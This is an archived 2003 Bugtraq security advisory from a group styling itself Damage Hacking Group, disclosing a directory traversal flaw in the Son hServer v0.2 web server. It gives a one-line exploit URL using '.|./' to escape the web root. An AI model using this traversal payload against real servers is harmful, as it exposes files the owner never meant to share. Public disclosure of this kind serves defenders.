Son hServer v0.2: directory traversal

From: D4rkGr3y (grey_1999_at_mail.ru)
Date: 05/30/03

  • Next message: postmaster_at_ytech.co.il: "Remote PC Access Server 2.2 Vulnerability" 
    Date: Thu, 29 May 2003 16:10:50 -0700
To: bugtraq@security.nnov.ru, bugtraq@securityfocus.com

    -----BEGIN PGP SIGNED MESSAGE-----

    ################################################################
    # _____ __ __ ___ #
    # ........\ \.| |.| |/ \........ #
    # : / \| | | | __> : #
    # : / _ \ |_| | / __ : #
    # : / / \ | <_/ \ : #
    # :..../ _/ / _ | ` \....: #
    # : \_________/__| |__|_______/ : #
    # : Damage Hacking Group : #
    # : Security Advisory : #
    # :.............................: #
    # #
    # http://www.dhgroup.org #
    #b d#
    ##b,________________________________________________________.d##
    | |
      Product: Son hServer v0.2
      Authors: super-m.narod.ru
    | Vulnerability: directory traversal |
    #--------------------------------------------------------------#
    | Overview: |
      ~~~~~~~~~

      Small russian http server
    | |
    #--------------------------------------------------------------#
    | Problem: |
      ~~~~~~~~

      This server doesn't filter the "|" (slash) symbol.
    | |
    #--------------------------------------------------------------#
    | Exploit: |
      ~~~~~~~~

      Type in your browser: "http://[server]/.|./" and enjoy ;)
    | |
    #--------------------------------------------------------------#
    | :wow: |
      www.dhgroup.org -=> opened English version! Come on in :)
       ~~~
       NeKr0 /DHG www.dhgroup.org
    | |
    #______________________________________________________________#
     \___________________________da_end___________________________/
     

    Best regards www.dhgroup.org
      D4rkGr3y icq 540981

    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

    iQCVAwUBPtaTcm4LIpseSJmPAQGULAP8Cwy21KIFzkUd+OxQBkO8cReTtn2xLo/k
    r/N6wSvMCXk3LKqrLAh+pdHXt76rqX9zI5z2nwrV8P05S4DYtlFSGPDMiCFEyQ/u
    LZwRs6HiuF3A0DBph9AXAJEfNZfUsX9M619kLk1RTK22T0GqcsPG+fZCh8RBdCBp
    /zIvGD+T5gc=
    =it5C
    -----END PGP SIGNATURE-----

  • Next message: postmaster_at_ytech.co.il: "Remote PC Access Server 2.2 Vulnerability"